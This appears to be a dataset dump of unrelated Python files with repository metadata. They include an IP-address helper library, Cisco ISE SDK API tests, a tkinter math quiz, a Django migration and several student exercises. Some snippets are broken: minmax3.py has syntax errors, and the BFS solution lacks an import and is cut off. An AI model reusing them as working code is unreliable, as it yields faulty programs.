if __name__ == '__main__':
endPoint = WebQuestionsEndPoint()
# endPoint.add_ids(RAW_QUESTION_PATH, QUESTION_PATH)
# endPoint.write_top_entities(SMART_TOPIC_PATH, QUESTION_PATH, ALL_TOPIC_PATH)
# endPoint.get_cands(QUESTION_PATH, ALL_TOPIC_PATH, CANDS_DIR)
# endPoint.generate_query_graph_cands(QUESTION_PATH, ALL_TOPIC_PATH, CANDS_DIR, CANDS_WTIH_CONSTRAINTS_DIR)
# endPoint.deduplicate(QUESTION_PATH, CANDS_WTIH_CONSTRAINTS_DIR, CANDS_WTIH_CONSTRAINTS_DIR_DEDUP)
endPoint.rescale_rewards_max(CANDS_WTIH_CONSTRAINTS_DIR_DEDUP, CANDS_WTIH_CONSTRAINTS_RESCALED_DIR)
| [
"[email protected]"
]
| |
cb2811ebb7323dde07db3204b7cbb018b4aa24df | b5aef1178c9153ca0c4dd9823e5fa2a2bc64649f | /sqlalchemy_to_ormar/maps.py | 1a9e860b78fc123c5831dcea9f9bd6c03d9d63d5 | [
"MIT"
]
| permissive | collerek/sqlalchemy-to-ormar | 970a56c69ff03b7e32b11e4b1ebcb00c3b8d903c | 07c1595297221b31db86b3d34b3aad54fa3967da | refs/heads/main | 2023-04-23T10:41:04.426391 | 2021-05-16T14:10:38 | 2021-05-16T14:10:38 | 355,256,537 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | py | from typing import Dict, Set, Type
import ormar
from ormar import Model
FIELD_MAP = {
"integer": ormar.Integer,
"tinyint": ormar.Integer,
"smallint": ormar.Integer,
"bigint": ormar.Integer,
"small_integer": ormar.Integer,
"big_integer": ormar.BigInteger,
"string": ormar.String,
"char": ormar.String,
"varchar": ormar.String,
"text": ormar.Text,
"mediumtext": ormar.Text,
"longtext": ormar.Text,
"float": ormar.Float,
"decimal": ormar.Decimal,
"date": ormar.Date,
"datetime": ormar.DateTime,
"timestamp": ormar.DateTime,
"time": ormar.Time,
"boolean": ormar.Boolean,
"bit": ormar.Boolean,
}
TYPE_SPECIFIC_PARAMETERS: Dict[str, Dict] = {
"string": {"max_length": {"key": "length", "default": 255}},
"varchar": {"max_length": {"key": "length", "default": 255}},
"char": {"max_length": {"key": "length", "default": 255}},
"decimal": {
"max_digits": {"key": "precision", "default": 18},
"decimal_places": {"key": "scale", "default": 6},
},
}
COMMON_PARAMETERS: Dict[str, Dict] = dict(
name={"key": "name", "default": None},
primary_key={"key": "primary_key", "default": False},
autoincrement={"key": "autoincrement", "default": False},
index={"key": "index", "default": False},
unique={"key": "unique", "default": False},
nullable={"key": "nullable", "default": None},
default={"key": "default", "default": None},
server_default={"key": "server_default", "default": None},
)
PARSED_MODELS: Dict[Type, Type[Model]] = dict()
CURRENTLY_PROCESSED: Set = set()
| [
"[email protected]"
]
| |
96f12a1ab1eb7f33d8ce8497a6de454ae5054716 | 12fe05ebba89ea0f11d6f5d2fd8f047ee6369ff6 | /minmax3.py | c6f28978343f73c011e14f3c2fb0c7170c66fa0b | []
| no_license | daniilvarlamov/domzad | d467c4b9f51a1a640b0b001216849131c2463500 | 69e1b4c6fa27dc4d17499cfc6817c97d90f8391a | refs/heads/main | 2023-01-20T21:58:33.078060 | 2020-11-26T09:18:16 | 2020-11-26T09:18:16 | 303,324,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | N = int(input("Введите количество прямоугольников")
for i in range (N):
a = int(input("Введите стороны прямоугольника")
b = int(input())
P = 2*(a+b)
if (i=1):
Max = P
if (P>Max):
Max = P
print(Max)
| [
"[email protected]"
]
| |
c751ca648f50a29345bf726fcde090faab5448ec | 7019f0dd96c69fb5c66a0840ed989e86e489496a | /Exercises Python Brasil/01 - Estrutura Sequencial/18.py | d487f416b6ee013961afddee3aaf5529929b9ba4 | []
| no_license | leonardokiyota/Python-Training | e1d8343156d96fd085e1dbae8c48770ae0725347 | 38a9ce8cb5558f2a73060243d458ea92d91bf945 | refs/heads/master | 2021-01-10T08:40:30.100115 | 2016-01-12T01:36:30 | 2016-01-12T01:36:30 | 49,223,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # -*- coding: utf-8 -*-
"""
Faça um programa que peça o tamanho de um arquivo para download (em MB) e a
velocidade de um link de Internet (em Mbps), calcule e informe o tempo aproximado de
download do arquivo usando este link (em minutos).
""" | [
"[email protected]"
]
| |
dae66138f278fea5834382498b52becae34edd5a | 063934d4e0bf344a26d5679a22c1c9e5daa5b237 | /margrave-examples-internal/capirca-margrave/capirca-r242-MODIFIED/lib/nacaddr.py | fc06f176005b79e1c4e5f83d4af8c3da2abb3c74 | [
"Apache-2.0"
]
| permissive | tnelson/Margrave | 329b480da58f903722c8f7c439f5f8c60b853f5d | d25e8ac432243d9ecacdbd55f996d283da3655c9 | refs/heads/master | 2020-05-17T18:43:56.187171 | 2014-07-10T03:24:06 | 2014-07-10T03:24:06 | 749,146 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,241 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A subclass of the ipaddr library that includes comments for ipaddr objects."""
__author__ = '[email protected] (Tony Watson)'
from third_party import ipaddr
def IP(ipaddress, comment='', token=''):
"""Take an ip string and return an object of the correct type.
Args:
ip_string: the ip address.
comment:: option comment field
token:: option token name where this address was extracted from
Returns:
ipaddr.IPv4 or ipaddr.IPv6 object or raises ValueError.
Raises:
ValueError: if the string passed isn't either a v4 or a v6 address.
Notes:
this is sort of a poor-mans factory method.
"""
a = ipaddr.IPNetwork(ipaddress)
if a.version == 4:
return IPv4(ipaddress, comment, token)
elif a.version == 6:
return IPv6(ipaddress, comment, token)
class IPv4(ipaddr.IPv4Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv4Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv4 supernet so we can maintain comments.
See ipaddr.IPv4.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv4(ipaddr.IPv4Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
class IPv6(ipaddr.IPv6Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv6Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv6Network supernet so we can maintain comments.
See ipaddr.IPv6Network.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv6(ipaddr.IPv6Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def CollapseAddrListRecursive(addresses):
"""Recursively loops through the addresses, collapsing concurent netblocks.
Example:
ip1 = ipaddr.IPv4Network('1.1.0.0/24')
ip2 = ipaddr.IPv4Network('1.1.1.0/24')
ip3 = ipaddr.IPv4Network('1.1.2.0/24')
ip4 = ipaddr.IPv4Network('1.1.3.0/24')
ip5 = ipaddr.IPv4Network('1.1.4.0/24')
ip6 = ipaddr.IPv4Network('1.1.0.1/22')
CollapseAddrRecursive([ip1, ip2, ip3, ip4, ip5, ip6]) ->
[IPv4Network('1.1.0.0/22'), IPv4Network('1.1.4.0/24')]
Note, this shouldn't be called directly, but is called via
CollapseAddr([])
Args:
addresses: List of IPv4 or IPv6 objects
Returns:
List of IPv4 or IPv6 objects (depending on what we were passed)
"""
ret_array = []
optimized = False
for cur_addr in addresses:
if not ret_array:
ret_array.append(cur_addr)
continue
if ret_array[-1].Contains(cur_addr):
# save the comment from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
elif cur_addr == ret_array[-1].Supernet().Subnet()[1]:
ret_array.append(ret_array.pop().Supernet())
# save the text from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
else:
ret_array.append(cur_addr)
if optimized:
return CollapseAddrListRecursive(ret_array)
return ret_array
def CollapseAddrList(addresses):
"""Collapse an array of IP objects.
Example: CollapseAddr(
[IPv4('1.1.0.0/24'), IPv4('1.1.1.0/24')]) -> [IPv4('1.1.0.0/23')]
Note: this works just as well with IPv6 addresses too.
Args:
addresses: list of ipaddr.IPNetwork objects
Returns:
list of ipaddr.IPNetwork objects
"""
return CollapseAddrListRecursive(
sorted(addresses, key=ipaddr._BaseNet._get_networks_key))
def SortAddrList(addresses):
"""Return a sorted list of nacaddr objects."""
return sorted(addresses, key=ipaddr._BaseNet._get_networks_key)
def RemoveAddressFromList(superset, exclude):
"""Remove a single address from a list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
exclude: a single nacaddr IPv4 or IPv6 address
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
ret_array = []
for addr in superset:
if exclude == addr or addr in exclude:
# this is a bug in ipaddr v1. IP('1.1.1.1').AddressExclude(IP('1.1.1.1'))
# raises an error. Not tested in v2 yet.
pass
elif exclude.version == addr.version and exclude in addr:
ret_array.extend([IP(x) for x in addr.AddressExclude(exclude)])
else:
ret_array.append(addr)
return ret_array
def AddressListExclude(superset, excludes):
"""Remove a list of addresses from another list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
excludes: a List nacaddr IPv4 or IPv6 addresses
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
superset = CollapseAddrList(superset)
excludes = CollapseAddrList(excludes)
ret_array = []
for ex in excludes:
superset = RemoveAddressFromList(superset, ex)
return CollapseAddrList(superset)
ExcludeAddrs = AddressListExclude
class PrefixlenDiffInvalidError(ipaddr.NetmaskValueError):
"""Holdover from ipaddr v1."""
if __name__ == '__main__':
pass
| [
"[email protected]"
]
| |
141b42291593793cc3abb2c8eb5ac5c5b1d0950b | b9a900189095b6af89fb5b941773edaee69bd47d | /InformationAPI/information/migrations/0004_auto_20201209_1427.py | 99cc52a1662a6739531891e8388c62b500bc13f7 | []
| no_license | tyagisen/information | 6aa84a0b44920f69efa7ac2bdf62278c4260efaf | ecc6dfd902632603c5080a6e330c3b57462edd97 | refs/heads/master | 2023-01-30T22:18:22.738513 | 2020-12-10T01:50:00 | 2020-12-10T01:50:00 | 318,956,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | # Generated by Django 3.1.3 on 2020-12-09 14:27
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('information', '0003_auto_20201207_0911'),
]
operations = [
migrations.AlterField(
model_name='information',
name='info_list',
field=ckeditor.fields.RichTextField(),
),
]
| [
"[email protected]"
]
| |
d35605db5bdf283207a2c171638328c4c8b53252 | 4e30d990963870478ed248567e432795f519e1cc | /tests/api/v3_1_1/test_nbar_app.py | 13a1bcd9798917799871178339c1315dd3a03d61 | [
"MIT"
]
| permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 9,399 | py | # -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI nbar_app API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from ciscoisesdk.exceptions import ciscoisesdkException
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.1.1', reason='version does not match')
def is_valid_get_nbar_apps(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_1e8a476ad8455fdebad0d8973c810495_v3_1_1').validate(obj.response)
return True
def get_nbar_apps(api):
endpoint_result = api.nbar_app.get_nbar_apps(
filter='value1,value2',
filter_type='string',
page=0,
size=0,
sort='string',
sort_by='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_apps(api, validator):
try:
assert is_valid_get_nbar_apps(
validator,
get_nbar_apps(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_nbar_apps_default(api):
endpoint_result = api.nbar_app.get_nbar_apps(
filter=None,
filter_type=None,
page=None,
size=None,
sort=None,
sort_by=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_apps_default(api, validator):
try:
assert is_valid_get_nbar_apps(
validator,
get_nbar_apps_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_nbar_app(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_ccc30178afce5e51a65e96cd95ca1773_v3_1_1').validate(obj.response)
return True
def create_nbar_app(api):
endpoint_result = api.nbar_app.create_nbar_app(
active_validation=False,
description='string',
id='string',
name='string',
network_identities=[{'ports': 'string', 'protocol': 'string'}],
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_create_nbar_app(api, validator):
try:
assert is_valid_create_nbar_app(
validator,
create_nbar_app(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def create_nbar_app_default(api):
endpoint_result = api.nbar_app.create_nbar_app(
active_validation=False,
description=None,
id=None,
name=None,
network_identities=None,
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_create_nbar_app_default(api, validator):
try:
assert is_valid_create_nbar_app(
validator,
create_nbar_app_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_61e99726f3745554a07ee102f74fe3bd_v3_1_1').validate(obj.response)
return True
def get_nbar_app_by_id(api):
endpoint_result = api.nbar_app.get_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_app_by_id(api, validator):
try:
assert is_valid_get_nbar_app_by_id(
validator,
get_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.get_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_get_nbar_app_by_id_default(api, validator):
try:
assert is_valid_get_nbar_app_by_id(
validator,
get_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_b55622f1671359919573b261ba16ea71_v3_1_1').validate(obj.response)
return True
def update_nbar_app_by_id(api):
endpoint_result = api.nbar_app.update_nbar_app_by_id(
active_validation=False,
description='string',
id='string',
name='string',
network_identities=[{'ports': 'string', 'protocol': 'string'}],
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_update_nbar_app_by_id(api, validator):
try:
assert is_valid_update_nbar_app_by_id(
validator,
update_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def update_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.update_nbar_app_by_id(
active_validation=False,
id='string',
description=None,
name=None,
network_identities=None,
payload=None
)
return endpoint_result
@pytest.mark.nbar_app
def test_update_nbar_app_by_id_default(api, validator):
try:
assert is_valid_update_nbar_app_by_id(
validator,
update_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_nbar_app_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
assert hasattr(obj, 'status_code')
json_schema_validate('jsd_44d289d5685350f5b00f130db0a45142_v3_1_1').validate(obj.response)
return True
def delete_nbar_app_by_id(api):
endpoint_result = api.nbar_app.delete_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_delete_nbar_app_by_id(api, validator):
try:
assert is_valid_delete_nbar_app_by_id(
validator,
delete_nbar_app_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def delete_nbar_app_by_id_default(api):
endpoint_result = api.nbar_app.delete_nbar_app_by_id(
id='string'
)
return endpoint_result
@pytest.mark.nbar_app
def test_delete_nbar_app_by_id_default(api, validator):
try:
assert is_valid_delete_nbar_app_by_id(
validator,
delete_nbar_app_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
| [
"[email protected]"
]
| |
d0bd583a39afd75f5fe496a88755cae09a18845d | b3309601462404e22f230fd836f05b8ae2570282 | /03_Generate_question_v4.py | c2af3ee62de1029d3824b6c8f33b19f88ebd6a48 | []
| no_license | Wardl1/Math-Quiz | cf441c6213a1cd5c239acc7b71611af1a10f5dfa | 377050ee8a15f8b03994b2ed8b97602a61a2a6c4 | refs/heads/main | 2023-07-24T23:32:45.188970 | 2021-09-05T07:56:37 | 2021-09-05T07:56:37 | 392,872,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,944 | py | """Component 3 Generate_Questions version 2
this version fixes the negative answers for the subtraction questions and
fixes the question heading so that it keeps up to date with the question number
"""
from tkinter import *
from functools import partial # To prevent unwanted additional windows
import random
class MathQuiz:
def __init__(self):
# Formatting variables
background_color = "#66FFFF" # light blue
# Main menu GUI frame
self.main_menu_frame = Frame(width=300, height=300,
bg=background_color, pady=10)
self.main_menu_frame.grid()
# Math Quiz heading (row 0)
self.MathQuiz_label = Label(self.main_menu_frame,
text="Math Quiz",
font=("Arial", "16", "bold"),
bg=background_color,
padx=10, pady=10)
self.MathQuiz_label.grid(row=0)
# Simple instructions given
self.intstruction_label = Label(self.main_menu_frame,
text="Pick one area of math"
" to work on \n and answer "
"the 10 questions given.",
font=("Arial", "12", "italic"),
bg=background_color,
padx=10, pady=10)
self.intstruction_label.grid(row=1)
# Addition button (row 2)
self.addition_button = Button(self.main_menu_frame, text="Addition",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.math_addition)
self.addition_button.grid(row=2)
# Subtraction button (row 3)
self.subtraction_button = Button(self.main_menu_frame,
text="Subtraction",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.math_subtraction)
self.subtraction_button.grid(row=3)
# All combined button (row 4)
self.combined_button = Button(self.main_menu_frame,
text="All Combined",
font=("Arial", "14"),
padx=10, pady=10,
width=10,
bg="#008CFF", # darker blue
fg="white",
command=self.all_combined)
self.combined_button.grid(row=4)
# math_addition function for when the addition_button is pressed
def math_addition(self):
print("1 + 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="add").generate_question()
# math_subtraction function for when the subtraction_button is pressed
def math_subtraction(self):
print("1 - 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="sub").generate_question()
# all_combined function for when the combined_button is pressed
def all_combined(self):
print("1 + / - 1 = ") # print statement to check function works
# opens question GUI
QuestionGUI(self, quest_type="both").generate_question()
class QuestionGUI:
def __init__(self, partner, quest_type):
# Formatting variables
background_color = "#3399FF" # darker blue
# disable Main menu buttons
partner.addition_button.config(state=DISABLED)
partner.subtraction_button.config(state=DISABLED)
partner.combined_button.config(state=DISABLED)
# sets up question type to determine if its an add,
# sub or both question
self.question_type = quest_type
# sets up question answer which will be needed to evaluate
# if the user is correct
self.question_answer = ""
# sets up question number so that the question heading updates
# when next button is pressed
self.question_number = 0
# sets up child window (ie: help box)
self.question_box = Toplevel()
# if users press at top, closes help and 'releases' help button
self.question_box.protocol('WM_DELETE_WINDOW',
partial(self.close_question, partner))
# Question Frame
self.question_frame = Frame(self.question_box, width=300,
bg=background_color)
self.question_frame.grid()
# Question Heading (row 0)
self.question_heading_label = Label(self.question_frame,
text="Question 1/10",
font="Arial 16 bold",
bg=background_color,
padx=10, pady=10)
self.question_heading_label.grid(row=0)
# User question to answer (row 1)
self.question_label = Label(self.question_frame,
font="Arial 12 bold", wrap=250,
justify=CENTER, bg=background_color,
padx=10, pady=10)
self.question_label.grid(row=1)
# Answer entry box (row 2)
self.answer_entry = Entry(self.question_frame, width=20,
font="Arial 14 bold",
bg="white")
self.answer_entry.grid(row=2)
# Incorrect or correct statement (row 3)
self.evaluator_label = Label(self.question_frame,
font="Arial 14 bold",
fg="green",
bg=background_color,
pady=10, text="Correct")
self.evaluator_label.grid(row=3)
# Sets up new frame for buttons to get a nice layout
self.button_frame = Frame(self.question_box, width=300,
bg=background_color)
self.button_frame.grid(row=1)
# Close button (row 0, column 0)
self.close_button = Button(self.button_frame, text="Close",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.close_question,
partner))
self.close_button.grid(row=0, column=0)
# Enter button (row 0, column 1)
self.enter_button = Button(self.button_frame, text="Enter",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.enter_question))
self.enter_button.grid(row=0, column=1)
# Next button (row 0, column 2)
self.next_button = Button(self.button_frame, text="Next",
width=8, bg="light grey",
font="arial 10 bold",
command=partial(self.generate_question))
self.next_button.grid(row=0, column=2)
def generate_question(self):
self.question_number += 1
# all combined variable to switch between add and sub
all_combined = ""
num_1 = random.randint(0, 10) # generates random number
num_2 = random.randint(0, 10)
# sets up question variable which is the text for the question_label
question = ""
if self.question_type == "both":
# chooses between add and sub to generate both questions
all_combined = random.choice(["add", "sub"])
if self.question_type == "add" or all_combined == "add":
question = ("{} + {} = ".format(num_1, num_2)) # creates question
self.question_answer = num_1 + num_2 # works out answer
elif self.question_type == "sub" or all_combined == "sub":
if num_1 > num_2:
# creates question
question = ("{} - {} = ".format(num_1, num_2))
self.question_answer = num_1 - num_2 # works out answer
else:
# creates question
question = ("{} - {} = ".format(num_2, num_1))
self.question_answer = num_2 - num_1 # works out answer
# changes question label so that it is the
self.question_label.config(text=question)
self.question_heading_label.config(text="Question {}/10".
format(self.question_number))
if self.question_number == 10:
self.next_button.config(state=DISABLED)
def close_question(self, partner):
# Put main menu button's back to normal...
partner.addition_button.config(state=NORMAL)
partner.subtraction_button.config(state=NORMAL)
partner.combined_button.config(state=NORMAL)
self.question_box.destroy() # closes question GUI
def enter_question(self):
print("Wrong answer") # prints to test button
# main routine
if __name__ == "__main__":
root = Tk()
root.title("Math Quiz")
something = MathQuiz()
root.mainloop()
| [
"[email protected]"
]
| |
96c8aab9ccb46dfa1211316172d290d9a600c701 | 6713b68c912af377c741b26fe31db0fe6f6194d4 | /1st Term/Data_Structure_and_Algorithms/Codes/Exercises/ses07/tests/q5.py | 5cb7344c66b6cf0467faf08698d3e66fc4443db3 | []
| no_license | Lanottez/IC_BA_2020 | 820e8d9c1dbb473ed28520450ec702f00c6684ed | 8abd40c6a5720e75337c20fa6ea89ce4588016af | refs/heads/master | 2023-08-25T05:52:08.259239 | 2021-11-03T07:27:11 | 2021-11-03T07:27:11 | 298,837,917 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | test = {
'name': 'Numpy - Q5',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> # It looks like you didn't give anything the name
>>> # fb_vol. Maybe there's a typo, or maybe you
>>> # just need to run the cell above this test cell where you defined
>>> # fb_vol. (Click that cell and then click the "run
>>> # cell" button in the menu bar above.)
>>> 'fb_vol' in vars()
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> fb_vol//0.0001 == 161.0
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
}
],
'scored': False,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"[email protected]"
]
| |
435f09a949e10d5926b47462513ec6a935159a57 | ba4f68fb01aa32970dadea67cc8d039b4c0f6d9e | /python/facebook_abcs/graphs/bfs_short_reach.py | d7e090dc241a595327009effbf8e195b8a27e16d | []
| no_license | campbellmarianna/Code-Challenges | 12a7808563e36b1a2964f10ae64618c0be41b6c0 | 12e21c51665d81cf1ea94c2005f4f9d3584b66ec | refs/heads/master | 2021-08-03T23:23:58.297437 | 2020-05-15T07:13:46 | 2020-05-15T07:13:46 | 168,234,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,585 | py | '''
Prompt:
Consider an undirected graph where each edge is the same weight. Each of the nodes is labeled consecutively.
You will be given a number of queries. For each query, you will be given a list of edges describing an undirected graph. After you create a representation of the graph, you must determine and report the shortest distance to each of the other nodes from a given starting position using the breadth-first search algorithm (BFS). Distances are to be reported in node number order, ascending. If a node is unreachable, print for that node. Each of the edges weighs 6 units of distance.
For example, given a graph with nodes and edges, , a visual representation is:
image
The start node for the example is node . Outputs are calculated for distances to nodes through : . Each edge is units, and the unreachable node has the required return distance of .
Function Description
Complete the bfs function in the editor below. It must return an array of integers representing distances from the start node to each other node in node ascending order. If a node is unreachable, its distance is .
bfs has the following parameter(s):
n: the integer number of nodes
m: the integer number of edges
edges: a 2D array of start and end nodes for edges
s: the node to start traversals from
Input Format
The first line contains an integer , the number of queries. Each of the following sets of lines has the following format:
The first line contains two space-separated integers and , the number of nodes and edges in the graph.
Each line of the subsequent lines contains two space-separated integers, and , describing an edge connecting node to node .
The last line contains a single integer, , denoting the index of the starting node.
Constraints
Output Format
For each of the queries, print a single line of space-separated integers denoting the shortest distances to each of the other nodes from starting position . These distances should be listed sequentially by node number (i.e., ), but should not include node . If some node is unreachable from , print as the distance to that node.
Sample Input
2 # the number of queries
4 2 # n: number of nodes m: number of edges in the graph
1 2 # u and v: describing an edge connecting node u to node v
1 3
1
3 1
2 3
2 # s: denoting the index of the starting node.
Sample Output
6 6 -1
-1 6
'''
# Very helpful Bread First Search is looping through a sorted array and adding to a queue
# https: // www.youtube.com/watch?v = -uR7BSfNJko
# Getting user input Iteration #1
# N = int(input())
# print(N)
# for _ in range(N):
# parts = input().strip().split(' ')
# print(parts)
for line in fileinput.input():
parts = line.strip().split(' ')
print(parts)
# Along with Breadth First Search Algorithm by lorisrossi https://www.hackerrank.com/challenges/bfsshortreach/forum
def bfs(n, m, edges, s):
from collections import deque
# Build graph
graph = {}
for num in range(1, n+1):
graph[num] = set()
for l, r in edges:
graph[l].add(r)
graph[r].add(l)
reached = {}
# Explore graph once
frontier = deque([(s, 0)])
seen = {s}
while frontier:
curr_node, curr_cost = frontier.popleft()
for nbour in graph[curr_node]:
if nbour not in seen:
seen.add(nbour)
reached[nbour] = curr_cost+6
